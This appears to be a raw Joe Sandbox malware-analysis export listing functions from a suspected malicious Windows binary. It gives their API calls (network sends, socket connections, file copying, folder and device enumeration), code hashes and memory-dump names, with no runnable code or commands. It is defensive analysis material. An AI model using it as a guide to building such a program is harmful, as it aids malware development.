• Snapshot File: hcaresult_0_2_6b70000_file.jbxd
Yara matches
Similarity
• API ID: dllmain_raw$dllmain_crt_dispatch
• String ID:
• API String ID: 3136044242-0
• Opcode ID: 39eed23b122465e1a2d0e313ba20584f9805ed1e2b2c26afa372eff1fa02ed84
• Instruction ID: 1441a2831d97d9aa7f9192c9eba59e58d67fc3ca338237b28dd3202245dadb4f
• Opcode Fuzzy Hash: 39eed23b122465e1a2d0e313ba20584f9805ed1e2b2c26afa372eff1fa02ed84
• Instruction Fuzzy Hash: 01214BB3D01619AFDBB19E25CC80EFE3A69EB84A94B056195F8156B210D2B08D01CFE2

Control-flow Graph (graph image not reproduced; the function's API calls are listed below)

APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 00AA96B4
• WSASend.WS2_32(?,?,00000001,?,00000000,00000000,00000000,?,Ws2_32.dll), ref: 00AA96C9
Strings
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: AddressProcSend
• String ID: Ws2_32.dll
• API String ID: 3987619627-3093949381
• Opcode ID: 05d3ee1d949b3c1b29b5e4a829a76301db68b0856d29d482683403bd9d51f4c1
• Instruction ID: 969d2c647f9b79f717578c7bf1dcec9b0f0e6b7693716f1a9bae22ba1fddf816
• Opcode Fuzzy Hash: 05d3ee1d949b3c1b29b5e4a829a76301db68b0856d29d482683403bd9d51f4c1
• Instruction Fuzzy Hash: FC02D070D04298DFDF25CFA4C8907ADBBB0EF5A314F24428DE4856B6C6D7741986CB92

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 13278 aa8f20-aa8f78 13279 aa8f7a 13278->13279 13280 aa8f7e-aa8fe5 call aa8b50 13278->13280 13279->13280 13283 aa9006-aa900f 13280->13283 13284 aa8fe7-aa8fee 13280->13284 13285 aa9030-aa905b call abae80 call b8a3a0 13283->13285 13286 aa9011-aa9018 13283->13286 13284->13283 13287 aa8ff0-aa8ffd 13284->13287 13297 aa906e-aa9075 call ab8dc0 13285->13297 13298 aa905d-aa9064 13285->13298 13286->13285 13288 aa901a-aa9027 13286->13288 13287->13283 13292 aa8fff-aa9001 13287->13292 13288->13285 13295 aa9029-aa902b 13288->13295 13292->13283 13295->13285 13302 aa907a-aa9081 13297->13302 13299 aa9068-aa906c 13298->13299 13300 aa9066 13298->13300 13299->13302 13300->13299 13303 aa9083 13302->13303 13304 aa9085-aa909b 13302->13304 13303->13304 13305 aa909f-aa90bb call b8a3a0 13304->13305 13306 aa909d 13304->13306 13309 aa90bf-aa90dd call b8a3a0 13305->13309 13310 aa90bd 13305->13310 13306->13305 13313 aa90df 13309->13313 13314 aa90e1-aa90e8 13309->13314 13310->13309 13313->13314 13315 aa90ea 13314->13315 13316 aa90ec-aa9121 call b8a3a0 call ad5270 call b8a3a0 13314->13316 13315->13316 13323 aa9202 13316->13323 13324 aa9127 13316->13324 13325 aa9206-aa920f 13323->13325 13326 aa9130-aa913d 13324->13326 13327 aa9230-aa923c 13325->13327 13328 aa9211-aa9218 13325->13328 13329 aa913f 13326->13329 13330 aa9141-aa91f1 call c5ab10 GetProcAddress WSASend 13326->13330 13332 aa923e-aa9245 13327->13332 13333 aa925c-aa9271 13327->13333 13328->13327 13331 aa921a-aa921c 13328->13331 13329->13330 13338 aa9272-aa9276 13330->13338 13339 aa91f3-aa91fc 13330->13339 13337 aa9220-aa9227 13331->13337 13332->13333 13335 aa9247-aa9253 13332->13335 13335->13333 13342 aa9255-aa9257 13335->13342 13337->13327 13340 aa9229-aa922b 13337->13340 13338->13325 13339->13323 13339->13326 13340->13327 13342->13333
APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 00AA91D3
• WSASend.WS2_32(?,?,00000001,?,00000000,00000000,00000000), ref: 00AA91EC
Strings
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: AddressProcSend
• String ID: Ws2_32.dll
• API String ID: 3987619627-3093949381
• Opcode ID: 58ca9a42e233e9ea3618ea2d3b91c50887734d1b883af532b3886408e4e309e9
• Instruction ID: b86414dc89aaa147c37c06a0405d7d8e655ca6dcf669361db2dd3db142b2792f
• Opcode Fuzzy Hash: 58ca9a42e233e9ea3618ea2d3b91c50887734d1b883af532b3886408e4e309e9
• Instruction Fuzzy Hash: C4C16670E00614DFDB24DFA8D884B9EBBB0BF09710F18819DE856AB392D735AD05CB91
APIs
• GetLastError.KERNEL32(?,00000000), ref: 00B76B53
• CopyFileA.KERNEL32(?,?,00000000), ref: 00B76CA5
• GetLastError.KERNEL32(?,?,00000000), ref: 00B76CB3
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: ErrorLast$CopyFile
• String ID:
• API String ID: 936320341-0
• Opcode ID: 4c7431247ef03745243ab75feaa7506ae8c613d8f0e3e64a11a3b9052287a2b0
• Instruction ID: f97ba6d1b3f0dd7d17d6200727b70bd43ce95ee01c4dbd64a29e54861b8eb309
• Opcode Fuzzy Hash: 4c7431247ef03745243ab75feaa7506ae8c613d8f0e3e64a11a3b9052287a2b0
• Instruction Fuzzy Hash: D631D476E0464CAFDB10DFA4DC41BEDFBB8EB45324F1042AAE418A3381D7765A058BA1
APIs
• CreateDirectoryA.KERNEL32(?,00000000,00B03997), ref: 00B86BD5
• std::_Throw_Cpp_error.LIBCPMT ref: 00B86C04
• std::_Throw_Cpp_error.LIBCPMT ref: 00B86C15
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: Cpp_errorThrow_std::_$CreateDirectory
• String ID:
• API String ID: 2715195259-0
• Opcode ID: 3ae61bb6e1e486a3a2f17cbb1b12b5e7d691ede4f0afa8ac75994519619903d0
• Instruction ID: 1241194b0209a52a6fd14c3b19e7ebe7d58a61769c98262568f5be269ebd9ae3
• Opcode Fuzzy Hash: 3ae61bb6e1e486a3a2f17cbb1b12b5e7d691ede4f0afa8ac75994519619903d0
• Instruction Fuzzy Hash: C2F0F9B1941614ABC720AF58AD06B5977E8D701730F20036AF436577D0E7B50901C7A6
APIs
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B7F01A
Strings
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: FolderPath
• String ID: #>o
• API String ID: 1514166925-2384581134
• Opcode ID: e2d99eb6e9c2c8badc0d9f7e8e94bebc479d570fda4ebde80fd2dbe6f428f304
• Instruction ID: e0c6d797c21ca90019de3fbc2d935010345caefee27419c73f211cd10c311a98
• Opcode Fuzzy Hash: e2d99eb6e9c2c8badc0d9f7e8e94bebc479d570fda4ebde80fd2dbe6f428f304
• Instruction Fuzzy Hash: EC7144B0C05348DBEB24CFA8C985BEDBBB4EF09314F244299E8096B292D7755A84CF54
APIs
  • Part of subcall function 00B76B20: GetLastError.KERNEL32(?,00000000), ref: 00B76B53
• std::_Throw_Cpp_error.LIBCPMT ref: 00B76B04
• std::_Throw_Cpp_error.LIBCPMT ref: 00B76B15
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: Cpp_errorThrow_std::_$ErrorLast
• String ID:
• API String ID: 2454169095-0
• Opcode ID: 75bda0a00a5fcbf647960693753ebd2fd80785df143f5888fd7404547c902b2b
• Instruction ID: 9aabe2768244560cc1ac8938830880fef9155918d570dd265a86e7cd16d66616
• Opcode Fuzzy Hash: 75bda0a00a5fcbf647960693753ebd2fd80785df143f5888fd7404547c902b2b
• Instruction Fuzzy Hash: 9FD16AB0C00249DBDB14DFA8D9457EEFBB1EF15304F148299D409BB392EB715A49CBA2
                                                                          APIs
                                                                          • __Xtime_get_ticks.LIBCPMT ref: 00B76551
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B7655F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                          • String ID:
                                                                          • API String ID: 3390117325-0
                                                                          • Opcode ID: 2dc117c32368ce6c020cd8e89e1b996fdca6256299c1d821502e003b4338f3ab
                                                                          • Instruction ID: 46cb8e31f50eee7e4a65c67dcda374e270ee22c3e157b917387d72d51ce2c237
                                                                          • Opcode Fuzzy Hash: 2dc117c32368ce6c020cd8e89e1b996fdca6256299c1d821502e003b4338f3ab
                                                                          • Instruction Fuzzy Hash: 41A19B71D016099FDB14CFA8C995BAEBBF1EF44310F2582A9E829BB380D7759D44CB90
                                                                          APIs
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00B766EA
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00B766FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Cpp_errorThrow_std::_
                                                                          • String ID:
                                                                          • API String ID: 2134207285-0
                                                                          • Opcode ID: feaab509b568629c1d2727262f9761bbb09679527414c566d977ed813e3d8d3f
                                                                          • Instruction ID: d83dd5671cf280539dcf31c1eca851936158ba17ebfb56c4992c8ad3e405f1ca
                                                                          • Opcode Fuzzy Hash: feaab509b568629c1d2727262f9761bbb09679527414c566d977ed813e3d8d3f
                                                                          • Instruction Fuzzy Hash: B441F4B1D007418BCB24DF68D9417AEB7F0EB94710F18436AE829677D1E771EA05C792
                                                                          APIs
                                                                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,CF830579,?,00AE8CE6,00000000,CF830579,00C1A178,0000000C,00AE8DA2,00ADD07D,?), ref: 00AE8E55
                                                                          • GetLastError.KERNEL32(?,00AE8CE6,00000000,CF830579,00C1A178,0000000C,00AE8DA2,00ADD07D,?), ref: 00AE8E5F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ChangeCloseErrorFindLastNotification
                                                                          • String ID:
                                                                          • API String ID: 1687624791-0
                                                                          • Opcode ID: 548b2c772aff77004ff158967c9b018893f43c5899bdc72e5effde6f44b8625c
                                                                          • Instruction ID: c44f88c54d96b8b3255b5457fa597e083dc2f2d4184bd9441d936a7efae47e9f
                                                                          • Opcode Fuzzy Hash: 548b2c772aff77004ff158967c9b018893f43c5899bdc72e5effde6f44b8625c
                                                                          • Instruction Fuzzy Hash: C51149336051E05AC6256377AD86B7E77C98B82B34F29065DF91C8B1D3DF79CC828291
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,00D31770,?,?,?,?,?,?,?,00CC96AE), ref: 00BE593A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: S
                                                                          • API String ID: 1452528299-543223747
APIs
Memory Dump Source
• Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6b70000_file.jbxd
Yara matches
Similarity
• API ID: Cleanup$closesocketconnectfreeaddrinfosocket
• String ID:
• API String ID: 2878866204-0
APIs
• GetLastError.KERNEL32(00000000,?,?,00ADD2B1,?), ref: 00AEB9E2
• __dosmaperr.LIBCMT ref: 00AEB9E9
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: ErrorLast__dosmaperr
• String ID:
• API String ID: 1659562826-0
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 00AB4093
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 00AB546E
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 00AC9F7B
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• API String ID: 118556049-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.3215871519.0000000006260000.00000040.00001000.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6260000_file.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
APIs
• GetLastError.KERNEL32(?,75923100,00000010,00000000), ref: 00B663CD
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
APIs
• SetupDiGetClassDevsA.SETUPAPI(06BD9500,00000000,00000000,00000012), ref: 06B799A7
Memory Dump Source
• Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6b70000_file.jbxd
Yara matches
Similarity
• API ID: ClassDevsSetup
• String ID:
• API String ID: 2330331845-0
APIs
• ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(06B9CA21,00000001,06BEA924,00000000), ref: 06B7D41D
Memory Dump Source
• Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6b70000_file.jbxd
Yara matches
Similarity
• API ID: DescriptorSecurity$ConvertString
• String ID:
• API String ID: 3907675253-0
                                                                          APIs
                                                                          • setsockopt.WS2_32(00000AD4,0000FFFF,00001006,00000AD4,00000008), ref: 06B824A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: setsockopt
                                                                          • String ID:
                                                                          • API String ID: 3981526788-0
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,?,00B86DBC,?,00ADCFE7,00B86DBC,?,00C19E10,00000010), ref: 00AE9918
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00ABABA8,00ABABA8,00000000,?,E5A31934,00AF6991,?,CE1CD6A7,00C8523A,?,00C97403,E186E883,00CDB66A,00C2EE18,?,00D51CF6), ref: 00AEB03B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B97345
                                                                          • _memcpy_s.LIBCPMTD ref: 06B977ED
                                                                          • _memcpy_s.LIBCPMTD ref: 06B97807
                                                                          • inet_ntop.WS2_32(00000002,?,00000000,00000016), ref: 06B97835
                                                                          • htons.WS2_32(?), ref: 06B97850
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B9785F
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B97C64
                                                                          • _memcpy_s.LIBCPMTD ref: 06B97D13
                                                                          • getaddrinfo.WS2_32(?,06BE11A8,00000001,00000000), ref: 06B97D35
                                                                          • WSAGetLastError.WS2_32 ref: 06B97D55
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B97D61
                                                                          • _memcpy_s.LIBCPMTD ref: 06B981FF
                                                                          • _memcpy_s.LIBCPMTD ref: 06B98229
                                                                          • inet_ntop.WS2_32(00000002,?,00000000,00000016), ref: 06B98257
                                                                          • htons.WS2_32(?), ref: 06B98272
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B98281
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B98674
                                                                          • _memcpy_s.LIBCPMTD ref: 06B98B19
                                                                          • _memcpy_s.LIBCPMTD ref: 06B98B33
                                                                          • inet_ntop.WS2_32(00000017,?,00000000,00000041), ref: 06B98B61
                                                                          • htons.WS2_32(?), ref: 06B98B7C
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B98B8B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
